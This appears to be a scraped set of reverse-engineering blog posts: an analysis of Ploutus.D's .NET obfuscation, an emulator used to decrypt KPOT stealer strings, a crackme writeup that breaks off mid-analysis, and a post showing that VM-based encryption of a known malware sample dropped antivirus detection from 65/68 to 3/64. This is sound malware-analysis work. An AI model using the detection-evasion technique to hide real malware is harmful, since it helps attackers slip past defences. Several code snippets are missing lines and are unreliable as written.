  "Value": "poXXXXX8"
  "Address": 43871204,
  "Name": null,
  "Properties": [ ],
  "Reference": 0,
  "Type": "System.String",
  "Value": "smtp.zoho.com"


I hope that you enjoyed this post and that you will find Shed useful in your analysis :)


[1] Process Hollowing
[2] _CorExeMain Function
[4] Unpacking yet another .NET crypter

Analyzing the nasty .NET protection of the Ploutus.D malware.

Twitter: @s4tan

EDIT: The source code is now online: https://github.com/enkomio/Conferences/tree/master/HackInBo2018

Recently the ATM malware Ploutus.D reappeared in the news as being used to attack US ATM ([1]). In this post I'll show a possible analysis approach aimed at understanding its main protection. The protection is composed of different layers of protection, I'll focus on the one that, in my hopinion, is the most annoying, leaving the others out. If you want a clear picture of all the implied protections, I strongly recommend you to take a look at the de4dot Reactor deobfuscator code.


Reversing .NET malware, in most cases, is not that difficult. This is mostly due to the awesome tool dnSpy ([2]), which allows debugging of the decompiled version of the Assembly. Most of the .NET malware use some kind of loader which decrypts a blob of data and then loads the result through a call to the Assembly.Load method ([3]).

From time to time some more advanced protection are involved, like the one analysed by Talos in [4]. What the article doesn't say is that in this specific case the malware uses a multi files assembly ([5]).

This implies that instead of using the Assembly.Load method, it uses the way less known Assembly.LoadModule method ([6]). This protection method is a bit more difficult to implement but I have to say that is way more effective as obfuscation. The malware also encrypt the method bodies and decrypt them only when necessary. This protection is easily overcome by calling the "Reload All Method Bodies" command in dnSpy at the right moment (as also showed in the Talos article).

Ploutus.D is also protected with an obfuscator which encrypts the method bodies and decrypts them only when necessary. The protector used is .NET Reactor ([7]) as also pointed out in a presentation by Karspersky ([8]). This particular protection is called NecroBit Protection, and from the product website we can read that:

NecroBit is a powerful protection technology which stops decompilation. NecroBit replaces the CIL code within methods with encrypted code. This way it is not possible to decompile/reverse engineer your method source code.

The difference with the previous case is that if we try to use the "Reload All Method Bodies" feature in dnSpy, it will fail (this is not technically correct since there is nothing to reload as we will see).

Reversing Ploutus.D obfuscation

To write this blog post I have reversed the sample with MD5 ae3adcc482edc3e0579e152038c3844e. When I start to analyse a .NET malware, as first task I ran my tool Shed ([9]) in order to have a broad overview of what the malware does and to try to extract dynamically loaded Assemblies. In this case I was able to extract some useful strings (like the configured backend usbtest[.]ddns[.]net) but not the Assembly with the method bodies decrypted (however this is not an error and as we will see it is the correct behaviour).

The next step is to debug the program with dnSpy. If you run it the following Form will be displayed:

I started to dig a bit on the classes that extend the Form class in order to identify which commands are supported. Unfortunately most of the methods of these classes are empty, as can be seen from the following screenshot:

It is interesting to note that all the static constructors are not empty. All of them are pretty simple (in some cases they have just one instruction), what it is interesting is that all of them call the same method: P9ZBIKXMsRMxLdTfcG.Nf9E3QXmJD();, which is marked as internal unsafe static void Nf9E3QXmJD().

By analysing it, the thing start to get interesting since this method is pretty huge, especially since it implements a very annoying control flow obfuscation. It is interesting to notice that if we set a breakpoint on this method and re-start the debugging session, it is amongst the first methods invoked by the program. Scrolling through the code we can find the following interesting statement:

if (P9ZBIKXMsRMxLdTfcG.Ax6OYTY7tiMf4Yu1B4(P9ZBIKXMsRMxLdTfcG.XnSi7dQe0TUTJbDcxg(P9ZBIKXMsRMxLdTfcG.CQNheW6eOQNeBsXbJC(processModule)), "clrjit.dll"))

This piece of code is particularly interesting, since it tries to identify the clrjit.dll module. Once found, it identifies the CLR version, which in my case is 4.0.30319.0. Then, it extracts the resource m7fEJg2w6sBe9LM3D3.i4tjc9Xt0Vhu5G72Uh.

After a while the getJit string appears in the execution. This function is exported by clrjit.dll and it is a very important method since it allows to get a pointer to the compileMethod method. To know more about it you could refer to my Phrack article about .NET program instrumentation ([10]). We can also identify a call to the VirtualProtect method.

With these information we can start to make some assumption, like that the malware hook the compileMethod method in order to force the compilation of the real MSIL bytecode. Let's verify our assumption, in order to do so we need to change tool, in particular we will use WinDbg with the SOS extension (if you want to know more about debugging .NET applications with WinDbg take a look at my presentaion [11]).

In order to inspect the program at the right moment, we will set an exception when the clrjit.dll library is loaded. This is easily done with the command:

sxe ld clrjit.dll
once that this exception is raised let's inspect the clrjit module as showed in the following image:

The getJit method is an exported by clrjit dll and returns the address of the VTable of an ICorJitCompiler object, where the first item is a pointer to the compileMethod method, as can be seen from the source code ([12]). But, since we don't trust the source code, let's debug the getJit method till the ret instruction and inspect the return value stored in eax:

as can be seen from the image above, the address of the compileMethod is at 0x70f049b0. Now let's the program run until the main windows is displayed and then break the process in the debugger. Let's display again the content of the VTable (which was 0x70f71420).

As can be seen from the image above the value of the first entry of the VTable changed to from 0x70f049b0 to 002a0000. So our assumption about the hooking of the compileMethod was right :)

Now we want to identify which method hooked the compileMethod method. To do this we will load the SOS extension (with the command .loadby SOS clrjit), set a breakpoint at the compileMethod method and when the brakpoint hits, type !CLRStack command to see which method was set as replacement. In order to trigger the compileMethod breakpoint I clicked on a random button in the interface.

from the image above we can spot that the interested method is qtlEIBBYuV. Find below the decompiled code of the metohd (I have renamed the argument names and added some comments):

What is interesting from the code above is that:
  • it reads the address of the COREINFO_METHOD_INFO structure at (1)
  • writes back the real MSIL bytecode at (2)
  • updates the fields ILCode and ILCodeSize at (3) and (4)
  • finally call the original compileMethod at (5)
In this way, it is sure that the correct MSIL code is compiled and executed (for more info on this structure please refer to [10,12]).

Finally, we have a pretty good understanding of how the real code is protected, now we can try to implement a simple program which dumps the real MSIL bytecode and rebuilds the assembly. The de4dot tool, instead, uses a different approach, which is based on emulating the decryption code of the method body and then rebuild the assembly.

Let's the code speak

A possible approach to dump the real MSIL bytecode is:
  • Hook the compileMethod before the malware
  • Force all static constructors to be invoked and force compilation of all methods via RuntimeHelpers.PrepareMethod. This will ensure that we are able to grab all the ILCode of the various methods.
  • When the hook is invoked store the values of the fields ILCode and ILCodeSize. We have to record also which method is currently compiled, this is done with the code getMethodInfoFromModule from [10].
  • Rebuild the assembly by using Mono.Cecil or dnlib (my choice)
However, for this specific case, I'll use a slightly different approach, which is not as generic as the previous one but it is simpler and more interesting imho :)

As we have seen from the code above, the P9ZBIKXMsRMxLdTfcG.k6dbsY0qhy is a dictionary of objects which contains the real MSIL bytecode as value and as key the address of the MSIL buffer. What we can do is to read the value of this object via reflection and rebuild the original binary. All this without implying the hooking of any methods :)

I have implemented a simple program that extracts those values via reflection, calculates the address of each method and rebuild the assembly. If you want to take a look it, here is the code.

After dumped the real MSIL, we can see that now the methods are not empty anymore:


The purpose of this post was to show how to analyse, in an effective way, a strongly obfuscate malware with the help of different tools and the knowledge of the internal working of the .NET framework.

As an alternative, if you want to obtain a de-obfuscated sample I encourage you to use the de4dot tool (and to read the code since this project is a gold mine of information related to the .NET internals).

At the time of this writing the sample is not correctly deobfuscated by de4dot due to an error in the string decryption step. To obtain a deobfuscated sample with the real method body, just comment out the string decryption step in ObfuscatedFile.cs.

Too often developers underestimate the power of reflection and as a result it is not uncommon to bypass protection (included license verification code) only by using reflection and nothing more :)


[1] First โ€˜Jackpottingโ€™ Attacks Hit U.S. ATMs - https://goo.gl/6WY14V
[2] dnSpy - https://github.com/0xd4d/dnSpy
[3] Assembly.Load Method (Byte[]) - https://goo.gl/owZtC1
[4] Recam Redux - DeConfusing ConfuserEx - https://goo.gl/oKgj1k
[5] How to: Build a Multifile Assembly - https://goo.gl/mVdHuU
[6] Assembly.LoadModule Method (String,โ€‚Byte[]) - https://goo.gl/D6N797
[7] .NET REACTOR - http://www.eziriz.com/dotnet_reactor.htm
[8] Threat hunting .NET malware with YARA.pdf - https://goo.gl/RxEw1G
[9] Shed, .NET runtime inspector - https://github.com/enkomio/shed
[10] http://www.phrack.org/papers/dotnet_instrumentation.html
[11] .NET for hackers - https://www.slideshare.net/s4tan/net-for-hackers
[12] getJit() - https://github.com/dotnet/coreclr/blob/master/src/inc/corjit.h#L241

Sacara VM Vs Antivirus Industry

Twitter: @s4tan

Sacara VM GitHub project: https://github.com/enkomio/sacara

In this blog post I want to describe a bit my latest side project and provides some data about how effective are protections based on software virtualization.

State of the art

If you ever read an academic paper, you have noticed that is imperative to describe which is the current state of the art of the topic discussed. I found this section very helpful so I decided to report here the articles that I have read and, according to my opinion, their technical level. Of course this is not a complete list and is very probable that I have missed some good resources.

Level beginner

As often happens there are a lot of good resource to start with, this is also true for the VM protection concept. At this level I think that the only needed skill is to be able to read Assembly and being able to use a debugger. If you are looking for some code to read I suggest you to take a look at Pasticciotto ([01]). It has also a nice writeup about how the VM works and which are the implemented opcodes. Another very interesting challenge is the one created by MalwareTechBlog, where you have to reverse a binary in order to obtain the flag. You can find a good write-up at [02].

Level intermediate

Let's raise the difficulty bar and see some projects that were created with the real purpose to protect the code. The required skill is to be able to create some simple scripts in order to easier your task, but nothing too advanced. By considering projects created only for fun, the two most renowned ones are the hyperunpackme2 by thehyper ([03]) and the ReWolf x86 Virtualizer ([04]).Maximus wrote a good (and lengthy) write-up about the first challenge at [05]. Even Rolf Rolles wrote a post where he created an IDA Processor module to analyze the code ([06]). Before you ask me, I don't consider writing a full IDA Processor as having basic IDA scripting skills :)

Level Advanced

To tackle advanced reverse engineering problems is not enough to have a very good understanding of theoretical concepts, but it is also necessary to be proficient with the available tools. At this level the amount of work that must be done in order to understand what a program is doing cannot be solved by just looking at the assembly code (at least without an enormous amount of pain). There are three cases that in particular I consider pretty difficult to analyze. The first one is a crackme challenge implemented by Solar Designer in 1996 (yes, you read it correctly, more than 22 years ago) [07]. In his project the author implemented what is know as a "one instruction set computer (OISC)", in particular he based all his work on the NOR instruction. The second one is the challenge number 12 of the 2018 Flare-On challenge (Suspicious Floppy Disk: Nick Harbour), in this case the author went one step further and implemented two nested OISC, where the first one is a SUbtract and Branch if Less than or EQual aka "subleq" and the second one is a Reverse Subtract and Skip if Borrow aka "RSSB".You can read a solution for this challenge at [08,09]. The last example, directly from the academia, is the tigress challenge [10], which is a challenge based on the obfuscation of the various hash functions, by using state-of-the-art protection (VM, Jitting ,etc...). A solution to part of the challenge was provided by Jonathan Salwan in [11]. As you can see by reading the solution of those challenges, the authors have used some advanced techniques that imply the creation of a custom CPU processor, or emulation via symbolic execution. Without a proficient knowledge of tools, solving that kind of challenges would result in a very complicated (almost impossible) task.

Introducing Sacara VM

Sacara is another project that implements a custom low level language that can be used to obfuscate part of code. It is not a tool that translate a PE binary in an obfuscated one, you have to write your own program :) It tries to protect the code by using some features that increase the difficulty in the reverse engineering process (like Opcode encryption based on the location, multiple opcodes representation, usage of NOR instruction to implements various arithmetic functions, anti-debugging, and so on). I created the project since I wanted to experiment a bit in this area, in the GitHub repository you can find the assembler (written in F#) and the VM to execute the code (written in x86 assembly). I'm not going to describe in details how it works, it is open source, read the code if you are curious :) Instead, I want to show you how effective can be this kind of protection in order to hide the real meaning of a program when the binary is analyzed by an Antivirus. Before to proceed I want to make clear that this post is not another rant post on how the AV industry sucks. Too often people forget how difficult is to implement such kind of programs. If you really want to write a rant post on it, please be sure to present also an effective solution to the identified problems.

Protecting a .NET binary

For my test I created a sample application that read a blob from the resource and load it via the Assembly.Load method. You can find the source code of this program in the GitHub project, under the Example\LoadEncryptedAssembly directory. The program allows to specify a .NET binary and a password in order to create a copy of itself with the specified file "encrypted" and embedded in its resources. The encryption is very simple, here is the code:
public static void ManagedEncrypt(Byte[] buffer, String password)
 var key = Encoding.Default.GetBytes(password);
 for (var i = 0; i 

Once done that, you can invoke the new created program, which just loads the resource, decrypt it and run it. 

The important point is that I used the Sacara VM in order to do the decryption of the data. To do this I created a simple 
script that you can find here, find below the source:

In order to have a realistic test I chose a malware from VirusTotal with a very high detection rate. After searching for the Assembly keyword I found this file:
3dd7ae0bca5e8e817581646c0e77885ffd3a60333a5bd24df9ccbe90b9938293, which has a 
detection rate of 65/68, as you can see in the following image:

Then, I ran the following command:
 LoadEncryptedAssembly.exe -b 3dd7ae0bca5e8e817581646c0e77885ffd3a60333a5bd24df9ccbe90b9938293 -p sacara
 -=[ Dynamically load encrypted Assembly SacaraVm sample ]=-
 For more information pass -h as argument
 New file 'LoadEncryptedAssembly.build.exe' generated. Run it to execute the program.
As I said before the command takes the file, encrypts it by using as password sacara and embeds it in the resource. It generates a new file named LoadEncryptedAssembly.build.exe, if you run it you will see that after a while the original malware binary is executed. The question is, how effective is this kind of protection? I have uploaded the new file to VT: 2e46664c52373b9ec14c64496cf1d18661e745fb83f1cdaaf73970d4fca59bbe in order to analyze it and as you can see from the following image the detection rate dropped drastically to 3/64:


As you have noticed by using an obfuscation based on a software VM allowed to hide a malware that had a detection rate of 65/68 to a detection rate of 3/64. The reason for this may be various, I suspect that the transaction from the managed world to the unmanaged world (in order to execute the decryption routine) may cause some problems. But this is something that most .NET malware already know, so I guess it shouldn't influence too much the result. The second possibility is that the software emulation of the encryption code has caused trouble to the detection engines. Of course, all of them are pure speculations :)


[01] pasticciotto - https://github.com/peperunas/pasticciotto [02] Reverse Engineering simple VM crackme - https://secrary.com/CrackMe/VM_1_MalwareTech/ [03] hyperunpackme2 by thehyper - https://crackmes.one/crackme/5ab77f5633c5d40ad448c280 [04] ReWolf x86 Virtualizer - https://github.com/rwfpl/rewolf-x86-virtualizer [05] Reversing a Simple Virtual Machine - http://index-of.co.uk/Reversing-Exploiting/Reversing a Simple Virtual Machine.pdf [06] Defeating HyperUnpackMe2 With an IDA Processor Module - http://www.msreverseengineering.com/blog/2014/8/5/defeating-hyperunpackme2-with-an-ida-processor-module [07] Hackme - ftp://ftp.df.ru/pub/solar/dos/hackme.com [08] Suspicious Floppy Disk - https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/FlareOn5_Challenge12_Solution.pdf] [09] Flare-On 2018 - Challenge 12 - Subleq'n'RSSB - https://emanuelecozzi.net/posts/ctf/flareon-2018-challenge-12-subleq-rssb-writeup/ [10] Reverse Engineering Challenges! - http://tigress.cs.arizona.edu/challenges.html [11] Tigress_protection - https://github.com/JonathanSalwan/Tigress_protection

Sojobo - Yet another binary analysis framework

Twitter: @s4tan

Sojobo GitHub project: https://github.com/enkomio/Sojobo

Sojobo is a new binary analysis framework written in .NET and based on B2R2. I created this project for learning purpose and to make my work easier during malware analysis.


A couple of months ago a new binary analysis framework named B2R2 was released ([01, 02]), which also won the "BAR 2019 Best Paper Award" ([03]). It immediately attracted my attention since it is fully developed in F# in .NET Core and doesn't need any external libraries. This was a big plus for me since I love F# and I always had issues with the most common binary analysis frameworks (like the needs of a specific library version or the python binding is not working with the latest version or they are supposed to run only on Linux).

B2R2 is a framework with an academic origin (this is a very rare case, since academic are reluctant to release working source code) and the developer is very responsive (and kind) on GitHub. It supports various CPU architectures and implements a new IR (LowUIR) which is very simple to understand. All sound very promising :)

Unfortunately, as the B2R2 main developer wrote ([04]), it is a frontend framework and at the moment no implementation is provided as backend. Also, they are considering running a business on the implementation of a backend framework and at the moment they are unsure when they will release it.

In the meantime that such code will be released I decided to write a backend on my own :)

Using Sojobo

Sojobo allows to emulate PE binary (32 bit) and to interact with the emulation. It implements a Sandbox class that can be used to emulate a given binary. In the following paragraph we will see how to write a simple generic unpacker.

Implementing a generic unpacker

As first example I tried to write a tool that dumps a dynamically allocated memory region which is then executed. My purpose was to write a generic unpacker (as a POC of course) by following the principles described in the paper "Automatic Static Unpacking of Malware Binaries" ([05]). This kind of tools are pretty common among malware analysts, recently a new one was released([06]).

You can find the source code of this sample in the GitHub repository, I'll paste it here for convenience:

#include <stdint.h>
#include <Windows.h>

void copy_code(void *buffer)
  jmp start
  push ebp
  mov ebp, esp
  xor eax, eax
  mov edx, 1
  mov ecx, DWORD PTR [ebp+8]
  xadd eax, edx
  loop l
  mov esp, ebp
  pop ebp
  mov esi, code;
  mov edi, buffer;
  mov ecx, start;
  sub ecx, code;
  rep movsb

int main()
 uint32_t ret_val = 0;
 void *fibonacci = VirtualAlloc(NULL, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
 ret_val = ((uint32_t (*)(uint32_t))fibonacci)(6);
 VirtualFree(fibonacci, 0x1000, MEM_RELEASE);
 return 0;

As you can see the code allocates a new memory region, invokes a function to copy some code and executes it. I tried to mimic a malware that unpacks the real payload in memory and then executes it. My goal is to dump such code.

To do that I'll follow a simple principle (described in the referred paper): if a memory region that was previously written to is executed, then I'll dump it to disk. By using Sojobo I subscribed to an event handler that is invoked each time that a memory is accessed. I can now step trough the process and monitor if a region that was previously written is now executed.

One of the first issue was to emulate invocation of external function (like VirtualAlloc). With Sojobo you can easily emulate such call by following a given coding convention (I'm a fan of convention over configuration paradigm [07]) but don't worry, Sojobo already implements emulation for some functions and I plan to support many more functions.

Saying that, the solution to our problem is the following one (the code is also in GitHub):

namespace ES.EndToEndTests

open System
open System.IO
open System.Collections.Generic
open B2R2
open ES.Sojobo.Model
open ES.Sojobo

module DumpDynamicMemory =
    let private _memoryRegions = new List<MemoryRegion>()
    let mutable private _memoryDumped = false

    let private memoryAccessedHandler(operation: MemoryAccessOperation) =
        match operation with
        | Read address -> ()
        | Write(address, value) -> ()
        | Allocate memRegion -> _memoryRegions.Add(memRegion)
        | Free memRegion -> ()

    let private writeDisassembly(activeProcess: IProcessContainer) =
        let text = Utility.formatCurrentInstruction(activeProcess)

    let private identifyUnpackedCode(activeProcess: IProcessContainer) =
        if not _memoryDumped then
            let pc = activeProcess.GetProgramCounter().Value |> BitVector.toUInt32
            |> Seq.tryFind(fun memRegion -> 
                pc >= uint32 memRegion.BaseAddress &&
                pc < uint32 memRegion.BaseAddress + uint32 memRegion.Content.Length
            |> Option.iter(fun memRegion ->
                // a previously allocated region now is being executed, maybe unpacked code!            
                let filename = String.Format("mem_{0}.bin", memRegion.BaseAddress)
                File.WriteAllBytes(filename, memRegion.Content)
                Console.WriteLine("[+] Dynamic code dumped to: {0}!", filename)
                _memoryDumped <- true

    let private step(activeProcess: IProcessContainer) =

    let private getTestFile() =
        ["Release"; "Debug"]
        |> Seq.map(fun dir -> Path.Combine("..", "..", "..", dir, "RunShellcodeWithVirtualAlloc.exe"))
        |> Seq.tryFind(File.Exists)

    let ``dump dynamically executed memory``() =
        let sandbox = new Win32Sandbox() 
        let exe = 
            match getTestFile() with
            | Some exe -> exe
            | None ->
                Console.WriteLine("RunShellcodeWithVirtualAlloc.exe not found, please compile it first!")


        // setup handlers
        let proc = sandbox.GetRunningProcess()
        // print imported function
        |> Seq.iter(fun symbol ->
                "Import: [0x{0}] {1} ({2}) from {3}", 
        // run the sample

The code is quite simple, each time that a memory region is allocated I add it to a list. For each executed instruction I monitor if EIP is in the range of one of the previously allocated memory and if so I dump the region content to disk. If we execute the code a new file is written to disk which contains the following disassembled code:

L_00000000:   push ebp
L_00000001:   mov ebp, esp
L_00000003:   xor eax, eax
L_00000005:   mov edx, 0x1
L_0000000A:   mov ecx, [ebp+0x8]
L_0000000D:   xadd eax, edx
L_00000010:   loop 0xd
L_00000012:   pop ebp
L_00000013:   ret 

A real world sample: emulates KPOT v2.0 and dumps the deobfuscated strings

Let's try to use Sojobo with a real world case. Recently, Proofpoint published a new article about a new KPOT version ([08]). We will consider the sample with SHA256: 67f8302a2fd28d15f62d6d20d748bfe350334e5353cbdef112bd1f8231b5599d.

In the GitHub repository I included the KPOT sample too, I took precaution to be sure that it is not executed by mistake (it is XORed, base64 encoded and with a corrupt PE header).

Our goal is to dump the strings once that they are decrypted. The function in charge for the decryption is at address 0x0040C8F5 and once that it returns in EAX is stored the length of the string and the EDI register points to the decrypted buffer. We can then read the memory content and print it.

Sojobo tries to emulate the most common functions and in particular it emulates GetLastError by returning 0 (success). If we take a look at the KPOT code we spot the following one:

.text:004103BB                 call    ds:LoadUserProfileW
.text:004103C1                 test    eax, eax
.text:004103C3                 jnz     short loc_4103D0
.text:004103C5                 call    ds:GetLastError
.text:004103CB                 cmp     eax, 57h ; 'W'
.text:004103CE                 jz      short loc_4103D5
.text:004103D0                 jmp     near ptr loc_4103D0+1 ; Jump to garbage

Basically, if the GetLastError code is different than 0x57 the process crash (jump to garbage data). So we have to override the GetLastError default function definition in order to force to return 0x57. This is done by creating a class with name Kernel32 and a function with name GetLastError that accepts as first parameter a ISandbox object. Take a look at this file for the implementation details. Then, we add our assembly to the Sandbox in order to consider our function implementation, finally as done before we setup a process step handler, which contains the following code:

private static void ProcessStep(Object sender, IProcessContainer process)
 var ip = process.GetProgramCounter().ToInt32();
 if (ip == _retAddresDecryptString)
  // read registers value
  var decryptedBufferAddress = process.GetRegister("EDI").ToUInt64();
  var bufferLength = process.GetRegister("EAX").ToInt32();
  // read decrypted string
  var decryptedBuffer = process.Memory.ReadMemory(decryptedBufferAddress, bufferLength);
  var decryptedString = Encoding.UTF8.GetString(decryptedBuffer);
  Console.WriteLine("[+] {0}", decryptedString);

By reversing the sample we know that the decrypt function end at address 0x0040C928, so when this point is reached we can dump the decrypted string by reading the EAX and EDI register values and also by reading the process memory. Find below an example of execution:

-=[ Start Emulation ]=-
[+] wininet.dll
[+] winhttp.dll
[+] ws2_32.dll
[+] user32.dll
[+] shell32.dll
[+] advapi32.dll
[+] dnsapi.dll
[+] netapi32.dll
[+] gdi32.dll
[+] gdiplus.dll
[+] oleaut32.dll
[+] ole32.dll
[+] shlwapi.dll
[+] userenv.dll
[+] urlmon.dll
[+] crypt32.dll
[+] mpr.dll
-=[ Emulation Completed ]=-

Of course that list is by no means exhaustive. We will see in the next paragraphs why of this.

It is really so simple and smooth?

I would love to say yes, but there are still some limitations (that I already planned to solve). The output above is taken by emulating the KPOT function that is in charge for loading the real used DLLs. Before that code we have the following one:

.text:00406966 64 A1 30 00 00 00             mov     eax, large fs:30h ; read PEB
.text:0040696C 8B 40 18                      mov     eax, [eax+18h]    ; read Heap
.text:0040696F C3                            retn

Basically, it reads the Heap base address from PEB. A solution to this would be to place some fake values but it is not a good solution in the long term (KPOT resolves function addresses by walking the EAT). So I defined a PEB and TEB structures and written them to the process memory (I also correctly initialized the FS register). I have also implemented a serialization algorithm that will allows us to "read" object type from memory (instead that just a bunch of raw bytes). This will be very handy if we want to customize some complex structure (like PEB in this case). In the next paragraph we will take advantage of this feature.

The second problem is that KPOT tries to resolve function addresses by walking the Ldr field. It also use the Ldr field to find the base address of Kernel32, this is done by the following code:

.text:00406936                               get_Kernel32_base_via_Ldr proc near
.text:00406936 64 A1 30 00 00 00             mov     eax, large fs:30h ; read PEB
.text:0040693C 8B 40 0C                      mov     eax, [eax+0Ch]    ; read Ldr
.text:0040693F 8B 40 0C                      mov     eax, [eax+0Ch]    ; read InLoadOrderModuleList
.text:00406942 8B 00                         mov     eax, [eax]        ; read first entry (ntdll)
.text:00406944 8B 00                         mov     eax, [eax]        ; read second entry (kernel32)
.text:00406946 8B 40 18                      mov     eax, [eax+18h]    ; read DllBase
.text:00406949 C3                            retn 
.text:00406949                               get_Kernel32_base_via_Ldr endp

Even in this case you can just fake this value and write back the LDR_DATA_TABLE_ENTRY structure to memory but very soon you will discover that this strategy with fail (in fact, in our test the emulation raise an exception).

Dumping all strings from KPOT v2.0 (for real)

In the previous paragraph was introduced a feature that allows us to read objects from the process memory. In this paragraph we will see how to dump all encrypted strings in a very easy way. As said by Proofpoint all strings are encrypted with a very simple algorithm and stored in a struct that has the following layout:

public class EncryptedString
 public UInt16 EncryptionKey;
 public UInt16 StringLength;
 public UInt32 Buffer;

 public String Decrypt(IProcessContainer process)
  var buffer = process.Memory.ReadMemory(this.Buffer, this.StringLength);
  var stringContent = new StringBuilder();
  foreach(var b in buffer)
   stringContent.Append((Char)(b ^ this.EncryptionKey));

  return stringContent.ToString();

It would be very useful if we can read from the memory process an EncryptedString object instead that a raw byte array (as done by the Proofpoint python script). With Sojobo you can do it and the code to print all the decrypted strings is as simple as this one:

private static void DecryptStrings(IProcessContainer process)
 Console.WriteLine("-=[ Start Dump All Strings ]=-");
 // encrypted strings
 var encryptedStringsStartAddress = 0x00401288UL;
 var encryptedStringsEndAddress = 0x00401838UL;

 var currentOffset = encryptedStringsStartAddress;
 while (currentOffset < encryptedStringsEndAddress)
  var encryptedString = process.Memory.ReadMemory<EncryptedString>(currentOffset);
  var decryptedString = encryptedString.Decrypt(process);
  Console.WriteLine("[+] {0}", decryptedString);

  // go to the next string
  currentOffset += 8UL; 

 Console.WriteLine("-=[ Dump All Strings Completed ]=-");

In the GitHub repository you can find the full source code (to dump all strings pass --strings as first argument). The result it is the same as the one provided by Proofpoint (but with a cleaner code :P).

Conclusion and future development

Sojobo is still in its infancy but it can already be used for some initial analysis. In its future releases I'm going to add more emulated functions and the possibility to map other files in the process address space. By mapping external files (like Kernel32 or Ntdll) we can overcome problems related to an indirect referencing (like in the case above) while still maintaining control on how to emulate the function.


[01] B2R2: Building an Efficient Front-End for Binary Analysis - https://www.reddit.com/r/ReverseEngineering/comments/aultc1/b2r2_building_an_efficient_frontend_for_binary/
[02] B2R2: Building an Efficient Front-End for Binary Analysis (PDF) - https://ruoyuwang.me/bar2019/pdfs/bar2019-final51.pdf/> [03] NDSS Workshop on Binary Analysis Research (BAR) 2019 - https://ruoyuwang.me/bar2019/
[04] Symbolic Execution component #question - https://github.com/B2R2-org/B2R2/issues/9
[05] Automatic Static Unpacking of Malware Binaries - https://www.researchgate.net/publication/221200507_Automatic_Static_Unpacking_of_Malware_Binaries
[06] MwEmu: Malware analysis emulator written in Python 3 (based on Unicorn) - ALPHA version - https://www.reddit.com/r/Malware/comments/bkb0p9/mwemu_malware_analysis_emulator_written_in_python/
[07] Convention over configuration - https://en.wikipedia.org/wiki/Convention_over_configuration
[08] New KPOT v2.0 stealer brings zero persistence and in-memory features to silently steal credentials - https://www.proofpoint.com/us/threat-insight/post/new-kpot-v20-stealer-brings-zero-persistence-and-memory-features-silently-steal

hm0x14 CTF: reversing a (not so simple) crackme

Twitter: @s4tan

Writeup GitHub project: https://github.com/enkomio/Misc/tree/master/Hm0x14Writeup

I'm not used to participate in CTF competition but in this case I personally know the author of this challenge and I consider her to be very smart, so I decided to give it a try. As I hope to show in this writeup, the challenge is very interesting and not the typical reverse engineering challenge.


The challenge file is:

SHA-256: 7cad36c64df33e30673d98e24be4d60c38ba433aa72f8d2bec14f69db4dbf173

It is a C++ application. As first step I run the application to see what it looks like. I have to admit that the author put a lot of effort in making the challenge appealing from a UI point of view. Below an image of the run of the challenge:


Before I continue, I have to say that this challenge remained unsolved since its creation. For this reason the author decided to have a talk on how to solve it. This write up is not based on her presentation.

When you open the file in IDA you can immediately see that the main function is quite big. Taking a look at the decompiled source code we can see that the program initializes a DES provider and then read the resource Segreto from 4DES which content is displayed in the image below:

Proceeding with the debugging, it is clear that most of the code is in charge for the UI animation. After stepping a bit with the debugger, it will block on the function that reads the input password. After this function, it is easy to trace the program and see which is the function that accepts as first parameter the input password (which is, in this case, the string "1234567890").

00402E97 | 8D8D 50FEFFFF | lea ecx,dword ptr ss:[ebp-1B0] |
00402E9D | 50            | push eax                       | eax:&L"1234567890"
00402E9E | E8 08F2FFFF   | call hm0x14.4020AB             |
00402EA3 | 59            | pop ecx                        | ecx:L"xe"
00402EA4 | 33C0          | xor eax,eax                    | eax:&L"1234567890"

By decompiling the code we can see that the main goal of this function is to invoke another function that I called hash_chars and then generates 4 symmetric keys. Since in the video there is a 4DES banner I suspect that this function creates 4 keys that will be used in this new crypto algorithm :)

  memset(&v25, 0, 0x20u);
  if ( v7 )
    v8 = password;
    v8 = *password;
  hash_chars(v8, &v25, v6);            ; generate 4DES key buffer (8 byte = 64 bit, a typical DES key length)
  if ( *(password + 20) < 8u )
    v9 = password;
    v9 = *password;
  hash_chars(v9 + 2 * v6, &v26, v6);   ; generate 4DES key buffer (8 byte = 64 bit, a typical DES key length)
  if ( *(password + 20) < 8u )
    v10 = password;
    v10 = *password;
  hash_chars(v10 + 4 * v6, &v27, v6);  ; generate 4DES key buffer (8 byte = 64 bit, a typical DES key length)
  if ( *(password + 20) >= 8u )
    v3 = *password;
  hash_chars(v3 + 6 * v6, &v28, hKey); ; generate 4DES key buffer (8 byte = 64 bit, a typical DES key length)
  v11 = v19;
  v12 = bcrypt_generate_symmetric_key(v19, &hKey, &v25);
  v13 = bcrypt_generate_symmetric_key(v11, &v22, &v26);
  v14 = bcrypt_generate_symmetric_key(v11, &v23, &v27);
  v15 = bcrypt_generate_symmetric_key(v19, &v21, &v27);      ; <----- ?!? (1)

At this point we are not in good luck, since breaking this algorithm seems to be not so easy (just consider that 3DES is still considered a strong algorithm). Let's take a look at the function in charge for creating the key from our password, in the image below I have highlighted the main points:

The loop is executed a number of times that depends on the password length. The meaning of the various circles is:

* blue circle: read the ith character of the input password

* orange circle: this is the main code. It just multiplies the current key value for 0x1F and save only the low DWORD result value (remember this fact).

* green circle: the value of the blue circle is added to the result

* read circle: before to return the result in the ESI register, the value is shifted left by 5 (other point to remember)

The code to generate the key from a password can be represented by the following F# code:

let hashChunk(password: String, offset: Int32, rounds: Int32) =
 let mutable result = 1UL
 for i=0 to rounds-1 do
  result <- (result * 0x1FUL) + uint64 password.[i + offset]
 (result <<< 5) &&& 0x00000000FFFFFFFFUL

let generateKey(password: String) =
 let keys = [
  let size = password.Length >>> 2
  for i=0 to 3 do
   let value = hashChunk(password, i * size, size)
   yield BitConverter.GetBytes(value)

 (keys.[1], keys.[0]) // I'll exaplin later why I only return these two keys

Finally, the decryption of the resource content is done by executing the following code:

Which can be summarized as:

P = D(E(D(E(C, k1), k2), k3), k4)

If during the decryption the application identify an error, the image of the skull is displayed (if you are wondering which skull, watch the first video till the end ^^).

Implementation Errors

Let's take a break to do a recap of the info that we have. Despite the fact that each key is 8 bytes long, only the first 4 bytes are used, so here we have the first error. However, breaking such a keyspace is still not feasible with my laptop.

One of the most important aspect that will help us is pointed out in the decompiled code above with reference (1). I'll rewrite the code below for easy reference:

v12 = bcrypt_generate_symmetric_key(v19, &hKey, &v25);
v13 = bcrypt_generate_symmetric_key(v11, &v22, &v26);
